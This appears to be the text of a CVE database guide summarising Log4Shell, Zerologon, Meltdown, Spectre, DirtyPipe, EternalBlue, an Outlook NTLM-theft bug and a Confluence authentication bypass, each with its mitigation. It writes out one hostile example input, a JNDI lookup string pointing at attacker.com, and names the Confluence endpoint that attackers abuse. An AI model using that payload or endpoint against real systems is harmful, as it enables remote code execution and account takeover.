CVE Database Guide

Log4Shell is a critical remote code execution vulnerability (CVSS 10.0) in Apache Log4j2 versions 2.0-beta9 through 2.14.1. An attacker can trigger arbitrary code execution by sending a crafted JNDI lookup string (e.g. ${jndi:ldap://attacker.com/exploit}) to any application that logs user-controlled input using Log4j2. The vulnerability is exploited via the JNDI (Java Naming and Directory Interface) feature. Mitigation requires updating to Log4j 2.17.0 or later.

Zerologon (CVSS 10.0) is a critical vulnerability in the Windows Netlogon Remote Protocol (MS-NRPC) that allows an attacker to establish a Netlogon secure channel connection to a domain controller using all-zero challenge bytes due to a cryptographic flaw in the AES-CFB8 implementation. This enables domain admin privilege escalation from an unauthenticated network position. All Windows Server versions are affected. Mitigation requires applying the KB4571702 patch.

Meltdown (CVE-2017-5754) exploits a flaw in Intel CPU out-of-order execution to read kernel memory from user space, bypassing memory isolation. It primarily affects Intel CPUs and is mitigated by KPTI (Kernel Page Table Isolation) patches. Spectre (CVE-2017-5753 for v1, CVE-2018-3639 for v4) exploits branch prediction and speculative execution to leak data across process boundaries. Spectre affects Intel, AMD, and ARM CPUs and requires a combination of microcode updates and compiler patches. Spectre is generally harder to exploit but also harder to fully mitigate.

DirtyPipe is a Linux kernel privilege escalation vulnerability (CVSS 7.8) affecting Linux kernel versions 5.8 through 5.16.10. It allows an unprivileged local user to overwrite data in read-only files, including SUID binaries, by exploiting a flaw in the pipe subsystem where the PIPE_BUF_FLAG_CAN_MERGE flag was not properly cleared. This enables writing arbitrary data to any file, including /etc/passwd, to gain root access. The fix is included in kernel version 5.16.11 and later.

You can search by CVE number (e.g. CVE-2021-44228), common vulnerability name (e.g. Log4Shell, Zerologon, EternalBlue, DirtyPipe), affected software name (e.g. Exchange, FortiOS, Confluence), or general keyword (e.g. RCE, SQL injection, privilege escalation). Use the category filter to narrow results to Web, Network, OS, Application, Service, or Hardware vulnerabilities.

EternalBlue is a remote code execution vulnerability in Microsoft SMBv1 (Server Message Block version 1) affecting Windows XP through Windows Server 2008 R2. Originally developed as an NSA exploit and leaked by the Shadow Brokers group, it was infamously used by the WannaCry ransomware in 2017. The vulnerability allows remote code execution without authentication by sending crafted SMB packets. Mitigation requires applying the MS17-010 patch and disabling SMBv1.

CVE-2023-23397 (CVSS 9.8) is a critical Microsoft Outlook vulnerability that enables NTLM hash theft via a specially crafted calendar invitation. The attack requires no user interaction — simply receiving the malicious email triggers the vulnerability. The victim's NTLM authentication hash is sent to an attacker-controlled server, enabling relay attacks or offline cracking. Mitigation requires updating Outlook and blocking outbound SMB traffic (port 445) at the network perimeter.

CVE-2023-22515 (CVSS 10.0) is a critical authentication bypass vulnerability in Atlassian Confluence Data Center and Server. An attacker can create administrator accounts without authentication by sending crafted POST requests to /setup/setupadministrator.action, effectively re-triggering the initial setup wizard on a production instance. This was actively exploited in the wild. Mitigation requires immediate patching and restricting access to Confluence instances from untrusted networks.